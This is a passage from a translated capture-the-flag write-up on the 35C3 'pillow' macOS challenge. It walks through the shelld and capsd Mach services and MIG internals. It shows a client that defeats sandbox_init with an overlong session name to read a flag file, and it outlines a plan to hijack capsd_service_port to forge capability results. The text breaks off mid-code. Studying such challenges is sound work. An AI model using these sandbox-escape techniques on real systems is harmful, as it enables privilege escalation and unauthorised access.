class="built_in">dispatch_source_cancel</span>(source);</span><br><span class="line">    <span class="built_in">dispatch_release</span>(source);</span><br><span class="line">&#125;);</span><br><span class="line"><span class="built_in">dispatch_resume</span>(source);</span><br></pre></td></tr></table></figure><p>Note the <strong>handle_process_exited</strong> function called inside the handler:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">handle_process_exited</span><span class="params">(<span class="type">pid_t</span> pid, CFMutableDictionaryRef session, <span class="type">int</span> output_fileno)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> status;</span><br><span class="line">    <span class="built_in">waitpid</span>(pid, &amp;status, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: child %d exited with status %d&quot;</span>, pid, status);</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> output[<span class="number">4096</span>];</span><br><span class="line">    <span class="type">size_t</span> nread = <span class="built_in">read</span>(output_fileno, output, <span class="built_in">sizeof</span>(output) - <span class="number">1</span>);</span><br><span class="line">    output[nread] = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    CFNumberRef value;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">CFDictionaryGetValueIfPresent</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;listener&quot;</span>), (<span class="type">const</span> <span class="type">void</span>**)&amp;value)) &#123;</span><br><span class="line">  
      <span class="type">mach_port_t</span> listener;</span><br><span class="line">        <span class="built_in">ASSERT</span>(<span class="built_in">CFNumberGetValue</span>(value, kCFNumberSInt32Type, &amp;listener));</span><br><span class="line">        <span class="built_in">shelld_client_notify</span>(listener, status, output);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">close</span>(output_fileno);</span><br><span class="line">    <span class="built_in">CFRelease</span>(session);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This function reads at most 4095 bytes of the child's stdout output (the 4096-byte buffer keeps one byte for the terminating NUL) and sends them to the listener port, i.e. the client.</p></li><li><p>Finally, the parent registers a timeout handler for the child: <strong>each child process may run for at most 60 s</strong>, and is killed immediately once it times out.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// set the child's timeout to 60 s</span></span><br><span class="line"><span class="built_in">dispatch_after</span>(<span class="built_in">dispatch_time</span>(DISPATCH_TIME_NOW, <span class="number">60</span> * NSEC_PER_SEC), <span class="built_in">dispatch_get_main_queue</span>(), ^&#123;</span><br><span class="line">    <span class="keyword">if</span> (!running)</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: killing process %d due to timeout&quot;</span>, pid);</span><br><span class="line">    <span class="built_in">kill</span>(pid, SIGKILL);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure></li></ol><h4 id="d-client-c">d. 
client.c</h4><p>The sample client does very little; the explanations are given as comments in the code.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">shelld_client_notify</span><span class="params">(<span class="type">mach_port_t</span> listener, <span class="type">int</span> status, <span class="type">const</span> <span class="type">char</span>* output)</span> </span>&#123;</span><br><span class="line">    <span 
class="built_in">printf</span>(<span class="string">&quot;Command finished with status %d and output: %s\n&quot;</span>, status, output);</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;PID: %d\n&quot;</span>, <span class="built_in">getpid</span>());</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Press enter to continue...&quot;</span>);</span><br><span class="line">    <span class="built_in">getchar</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// look up shelld's mach port</span></span><br><span class="line">    <span class="type">mach_port_t</span> bp, sp;</span><br><span class="line">    <span class="built_in">task_get_special_port</span>(<span class="built_in">mach_task_self</span>(), TASK_BOOTSTRAP_PORT, &amp;bp);</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bp, <span class="string">&quot;net.saelo.shelld&quot;</span>, &amp;sp);</span><br><span class="line">    <span class="built_in">ASSERT_SUCCESS</span>(kr, <span class="string">&quot;bootstrap_look_up&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// create a receive right (listener) and a matching send right (listener_send_right)</span></span><br><span class="line">    <span class="type">mach_port_t</span> listener, listener_send_right;</span><br><span class="line">    <span class="type">mach_msg_type_name_t</span> aquired_right;</span><br><span class="line">    <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), 
MACH_PORT_RIGHT_RECEIVE, &amp;listener);</span><br><span class="line">    <span class="built_in">mach_port_extract_right</span>(<span class="built_in">mach_task_self</span>(), listener, MACH_MSG_TYPE_MAKE_SEND, &amp;listener_send_right, &amp;aquired_right);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// create a session in shelld</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">shelld_create_session</span>(sp, <span class="string">&quot;foo&quot;</span>) != KERN_SUCCESS) &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Failed to create session&quot;</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// register listener_send_right as the session's listener</span></span><br><span class="line">    <span class="built_in">register_completion_listener</span>(sp, <span class="string">&quot;foo&quot;</span>, listener_send_right);</span><br><span class="line">    <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), listener_send_right);</span><br><span class="line">        </span><br><span class="line">    <span class="comment">// automatically handle notify calls made by the server</span></span><br><span class="line">    <span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, <span class="number">0</span>, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line">    <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">        <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, shelld_client_server);</span><br><span class="line">    &#125;);</span><br><span class="line">   
 <span class="built_in">dispatch_activate</span>(source);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// the client asks shelld to execute a command three times in a row</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%d\n&quot;</span>, <span class="built_in">shell_exec</span>(sp, <span class="string">&quot;foo&quot;</span>, <span class="string">&quot;echo Hello World &gt; bar&quot;</span>));</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%d\n&quot;</span>, <span class="built_in">shell_exec</span>(sp, <span class="string">&quot;foo&quot;</span>, <span class="string">&quot;cat bar&quot;</span>));</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%d\n&quot;</span>, <span class="built_in">shell_exec</span>(sp, <span class="string">&quot;foo&quot;</span>, <span class="string">&quot;cat bar&quot;</span>));</span><br><span class="line"></span><br><span class="line">    <span class="built_in">dispatch_main</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Output:</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108135403282.png" alt="image-20220108135403282"></p><h4 id="e-功能">e. 
Functionality</h4><p>From the code above, we can see that shelld dynamically creates a <strong>sandboxed</strong> child process based on the sender's <strong>permissions</strong> and <strong>request</strong>. The permissions here are the capabilities stored in <code>capsd</code>.</p><h2 id="四、漏洞点">IV. Vulnerabilities</h2><p>The exploit currently runs inside a sandbox, so it cannot read the flag outside directly. The only way to escape is through the two services the challenge provides. shelld exposes a shell_exec function that runs a new program, so we can try to make shelld spawn a child process that reads the flag. Two obstacles stand in the way:</p><ol><li>shell_exec first <strong>checks permissions (i.e. capabilities)</strong>: a requester without the <code>process-exec*</code> sandbox permission for <code>/bin/bash</code> cannot make shelld start a new process. The exploit runs in a sandbox whose rules do not grant this permission, so it cannot pass this check directly.</li><li>Even if the permission check is bypassed, the <strong>child process</strong> started by shell_exec still calls <code>sandbox_init</code> to <strong>enter a sandbox</strong>. Once inside, the child has no permission to read the flag.</li></ol><p>Let's start with the easier one.</p><h3 id="1-sandbox-init-沙箱函数绕过">1. Bypassing sandbox_init</h3><p>The child process started by shell_exec calls <code>sandbox_init</code>; if that call succeeds, the child cannot read the flag.</p><p>So how can we make sandbox_init fail? Look at the sb_profile_template string:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">const</span> <span class="type">char</span>* sb_profile_template =   <span class="string">&quot;(version 1)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(deny default)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(import \&quot;system.sb\&quot;)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow process-fork)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* file-write* (subpath 
\&quot;/private/tmp/shelld/%s\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read-data file-write-data (subpath \&quot;/dev/tty\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* process-exec (subpath \&quot;/bin/\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* process-exec (subpath \&quot;/usr/bin/\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* process-exec (subpath \&quot;/usr/sbin/\&quot;))\n&quot;</span>;</span><br></pre></td></tr></table></figure><p>In my tests, the <strong>length of a string in the Scheme sandbox profile (scheme in AppSandboxProfile) must not exceed 1023 bytes</strong>. If it does, parsing the Scheme profile fails and <code>sandbox_init</code> returns immediately <strong>without entering the sandbox</strong>.</p><p>Here is the test result:</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108161115411.png" alt="image-20220108161115411"></p><p>We can therefore bypass the child's sandbox initialization by <strong>passing an overlong session name</strong>, as the following client does:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span 
class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mig/shelld.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mig/shelld_client.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;common/utils.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;common/decls.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">boolean_t</span> <span class="title">shelld_client_server</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">mach_msg_header_t</span> *InHeadP,</span></span></span><br><span 
class="line"><span class="params"><span class="function">        <span class="type">mach_msg_header_t</span> *OutHeadP)</span></span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">shelld_client_notify</span><span class="params">(<span class="type">mach_port_t</span> listener, <span class="type">int</span> status, <span class="type">const</span> <span class="type">char</span>* output)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Command finished with status %d and output: %s\n&quot;</span>, status, output);</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// ./client `python -c &quot;print(&#x27;a&#x27;*3)&quot;`</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span>* argv[])</span> </span>&#123;</span><br><span class="line">    <span class="type">char</span>* session_name = argv[<span class="number">1</span>];</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;session_name: %s\n&quot;</span>, session_name);</span><br><span class="line"></span><br><span class="line">    <span class="type">mach_port_t</span> bp, sp;</span><br><span class="line">    <span class="built_in">task_get_special_port</span>(<span class="built_in">mach_task_self</span>(), TASK_BOOTSTRAP_PORT, &amp;bp);</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bp, <span class="string">&quot;net.saelo.shelld&quot;</span>, &amp;sp);</span><br><span class="line">    <span 
class="built_in">ASSERT_SUCCESS</span>(kr, <span class="string">&quot;bootstrap_look_up&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">mach_port_t</span> listener, listener_send_right;</span><br><span class="line">    <span class="type">mach_msg_type_name_t</span> aquired_right;</span><br><span class="line">    <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;listener);</span><br><span class="line">    <span class="built_in">mach_port_extract_right</span>(<span class="built_in">mach_task_self</span>(), listener, MACH_MSG_TYPE_MAKE_SEND, &amp;listener_send_right, &amp;aquired_right);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">shelld_create_session</span>(sp, session_name);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">register_completion_listener</span>(sp, session_name, listener_send_right);</span><br><span class="line">    <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), listener_send_right);</span><br><span class="line"></span><br><span class="line">    <span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, <span class="number">0</span>, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line">    <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">        <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, shelld_client_server);</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="built_in">dispatch_activate</span>(source);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// test basic functionality</span></span><br><span class="line">    <span 
class="built_in">printf</span>(<span class="string">&quot;%d\n&quot;</span>, <span class="built_in">shell_exec</span>(sp, session_name, <span class="string">&quot;echo &#x27;Hello World&#x27;&quot;</span>));</span><br><span class="line">    <span class="comment">// try to read data outside the sandbox</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%d\n&quot;</span>, <span class="built_in">shell_exec</span>(sp, session_name, <span class="string">&quot;cat /Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag&quot;</span>));</span><br><span class="line"></span><br><span class="line">    <span class="built_in">dispatch_main</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The output is:</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108212040495.png" alt="image-20220108212040495"></p><p>As shown, when the session name passed in is long enough, the sandbox call is bypassed and files outside the sandbox can be read.</p><p>This obstacle is solved.</p><h3 id="2-Capabilities-权限检测绕过">2. Bypassing the capabilities check</h3><blockquote><p>This is the core of the whole challenge and is somewhat involved.</p></blockquote><h4 id="a-提出的设想">a. 
The idea</h4><p>Next we need to bypass the sandbox_check_with_capabilities check. Here is its code again:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">sandbox_check_with_capabilities</span><span class="params">(<span class="type">audit_token_t</span> creds, <span class="type">const</span> <span class="type">char</span>* operation, <span class="type">int</span> flags, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> result = <span class="built_in">sandbox_check_by_audit_token</span>(creds, operation, flags, arg);</span><br><span class="line">    <span class="keyword">if</span> (result != <span class="number">1</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> result;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> client_has_capability = <span class="number">0</span>;</span><br><span class="line">    <span class="type">pid_t</span> pid = <span class="built_in">audit_token_to_pid</span>(creds);</span><br><span class="line">    <span class="built_in">has_capability</span>(capsd_service_port, pid, operation, arg, &amp;client_has_capability);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> !client_has_capability;</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>Clearly, as a <strong>sandboxed</strong> sender, the exploit has no permission to execute /bin/bash, so <code>sandbox_check_by_audit_token</code> always returns <strong>1</strong>. shelld then makes a second query, this time to capsd.</p><p>If capsd returned a "has capability" result to shelld, the exploit would pass the sandbox check and get the flag. Under normal circumstances, however, the exploit cannot pass the sandbox_check_* calls in capsd's grant_capability method, so capsd <strong>will not return</strong> the result we want to shelld.</p><p>But <strong>if we can hijack capsd_service_port</strong> and <strong>set up a fake "capsd" that sends forged results to shelld</strong>, we can pass shelld's sandbox check and get the flag.</p><p>How can we forge it? This is where the <strong>MIG ownership rule</strong> comes in.</p><h4 id="b-MIG-所有权规则">b. MIG ownership rule</h4><p>Ownership here means ownership of a <strong>mach port that the caller</strong> passes <strong>to a MIG routine</strong> as an <strong>argument</strong>.</p><p>When studying Mach IPC earlier, we only looked at examples of MIG passing primitive types and did not think about the details of passing complex-typed arguments.</p><p>Think about it now: when a <strong>caller passes a mach port</strong> to the server, how should the <strong>lifetime of that mach port</strong> be managed?</p><blockquote><p>We use shelld's <code>register_completion_listener</code> function as the example, because it is the only function that takes a mach port argument.</p></blockquote><h5 id="1-shelld-server">1) shelld_server</h5><p>At startup, shelld designates the shelld_server function to handle every incoming mach message. The MIG-generated shelld_server function is quite simple: it performs some basic checks, then uses the <code>msgh_id</code> field of the received mach message to select which routine to call:</p><blockquote><p>As mentioned before, every mach message header has a <code>msgh_id</code> field that is free for user code to use. MIG uses it to tell which server interface the client wants to call.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// shelldServer.c</span></span><br><span class="line"><span class="function">mig_external <span class="type">boolean_t</span> <span class="title">shelld_server</span></span></span><br><span class="line"><span class="function">    <span class="params">(<span class="type">mach_msg_header_t</span> *InHeadP, <span class="type">mach_msg_header_t</span> *OutHeadP)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">register</span> <span class="type">mig_routine_t</span> routine;</span><br><span class="line">    <span class="comment">// initialize the fields of the mach message to be returned to the client</span></span><br><span class="line">    OutHeadP-&gt;msgh_bits = <span class="built_in">MACH_MSGH_BITS</span>(<span class="built_in">MACH_MSGH_BITS_REPLY</span>(InHeadP-&gt;msgh_bits), <span class="number">0</span>);</span><br><span class="line">    OutHeadP-&gt;msgh_remote_port = InHeadP-&gt;msgh_reply_port;</span><br><span class="line">    <span class="comment">/* Minimal size: routine() will update it if different */</span></span><br><span class="line">    OutHeadP-&gt;msgh_size = (<span class="type">mach_msg_size_t</span>)<span class="built_in">sizeof</span>(<span class="type">mig_reply_error_t</span>);</span><br><span class="line">    OutHeadP-&gt;msgh_local_port = MACH_PORT_NULL;</span><br><span class="line">    OutHeadP-&gt;msgh_id = InHeadP-&gt;msgh_id + <span class="number">100</span>;</span><br><span class="line">    OutHeadP-&gt;msgh_reserved = <span class="number">0</span>;</span><br><span class="line">    <span class="comment">// 
check whether msgh_id is valid; if so, store the MIG handler routine for that msgh_id in the routine function pointer</span></span><br><span class="line">    <span class="keyword">if</span> ((InHeadP-&gt;msgh_id &gt; <span class="number">133703</span>) || (InHeadP-&gt;msgh_id &lt; <span class="number">133700</span>) ||</span><br><span class="line">        ((routine = shelld_subsystem.routine[InHeadP-&gt;msgh_id - <span class="number">133700</span>].stub_routine) == <span class="number">0</span>)) &#123;</span><br><span class="line">        ((<span class="type">mig_reply_error_t</span> *)OutHeadP)-&gt;NDR = NDR_record;</span><br><span class="line">        ((<span class="type">mig_reply_error_t</span> *)OutHeadP)-&gt;RetCode = MIG_BAD_ID;</span><br><span class="line">        <span class="keyword">return</span> FALSE;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// finally, call that MIG handler routine</span></span><br><span class="line">    (*routine) (InHeadP, OutHeadP);</span><br><span class="line">    <span class="keyword">return</span> TRUE;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Note that as long as MIG is working normally (that is, the incoming msgh_id is valid), shelld_server <strong>always returns TRUE</strong>.</p><p>We can also see that the <strong>message returned to the client is not COMPLEX</strong>.</p><blockquote><p>Note that the COMPLEX flag is not set when msgh_bits is assigned on OutHeadP.</p></blockquote><h5 id="2-Xregister-completion-listener">2) _Xregister_completion_listener</h5><p>When a client calls the register_completion_listener function, shelld_server dispatches to the corresponding routine, namely <code>_Xregister_completion_listener</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Routine register_completion_listener */</span></span><br><span class="line">mig_internal novalue _Xregister_completion_listener</span><br><span class="line">    (<span class="type">mach_msg_header_t</span> *InHeadP, <span class="type">mach_msg_header_t</span> *OutHeadP)</span><br><span class="line">&#123;</span><br><span class="line">[...]</span><br><span class="line">    <span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">        <span class="type">mach_msg_header_t</span> Head;</span><br><span class="line">        <span class="comment">/* start of the kernel processed data */</span></span><br><span class="line">        <span class="type">mach_msg_body_t</span> msgh_body;</span><br><span class="line">        <span class="type">mach_msg_port_descriptor_t</span> listener;</span><br><span class="line">        <span class="comment">/* end of the kernel processed data */</span></span><br><span class="line">        NDR_record_t NDR;</span><br><span class="line">        <span class="type">mach_msg_type_number_t</span> sessionOffset; <span class="comment">/* MiG doesn&#x27;t use it */</span></span><br><span class="line">        <span class="type">mach_msg_type_number_t</span> sessionCnt;</span><br><span class="line">        <span class="type">char</span> session[<span 
class="number">4096</span>];</span><br><span class="line">        <span class="type">mach_msg_max_trailer_t</span> trailer;</span><br><span class="line">    &#125; Request __attribute__((unused));</span><br><span class="line">[...]</span><br><span class="line">    <span class="keyword">typedef</span> __Request__register_completion_listener_t __Request;</span><br><span class="line">    <span class="keyword">typedef</span> __Reply__register_completion_listener_t Reply __attribute__((unused));</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Request *In0P = (Request *) InHeadP;</span><br><span class="line">    Reply *OutP = (Reply *) OutHeadP;</span><br><span class="line">    <span class="type">mach_msg_max_trailer_t</span> *TrailerP;</span><br><span class="line">[...]</span><br><span class="line">    OutP-&gt;RetCode = <span class="built_in">register_completion_listener</span>(In0P-&gt;Head.msgh_request_port, In0P-&gt;session, In0P-&gt;listener.name, TrailerP-&gt;msgh_audit);</span><br><span class="line">    </span><br><span class="line">[...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>As we can see, the client passes a mach port to the server through a <code>mach_msg_port_descriptor_t</code>. The routine then calls the interface that the server actually implements and stores its return value (a KERN_* code) in the <code>RetCode</code> field.</p><p>Below is the reply mach msg structure. This field is one of the few values that is propagated to the upper layer:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> Head;</span><br><span class="line">    NDR_record_t NDR;</span><br><span class="line">    <span class="type">kern_return_t</span> RetCode;</span><br><span class="line">&#125; 
__Reply__unregister_completion_listener_t __attribute__((unused));</span><br></pre></td></tr></table></figure><p>So where is this RetCode used? In other words, does the KERN_* value returned by the server's implementation affect the lifetime of the listener mach port that the server received?</p><p>It does.</p><h5 id="3-libdispatch">3) libdispatch</h5><p>Next, let's look at how libdispatch handles the mach message sent by the client.</p><p>In shelld, we can see that it tells libdispatch to call <code>dispatch_mig_server</code> to handle mach messages.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, service_port, <span class="number">0</span>, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line"></span><br><span class="line"><span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">    <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, shelld_server);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="built_in">dispatch_resume</span>(source);</span><br><span class="line"><span class="built_in">dispatch_main</span>();</span><br></pre></td></tr></table></figure><p>So let's take a brief look at <code>dispatch_mig_server</code>. Below is the core of its source code, abridged and heavily annotated:</p><blockquote><p>The libdispatch source is available from <a href="https://opensource.apple.com/tarballs/libdispatch/">apple opensource libdispatch src</a>.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 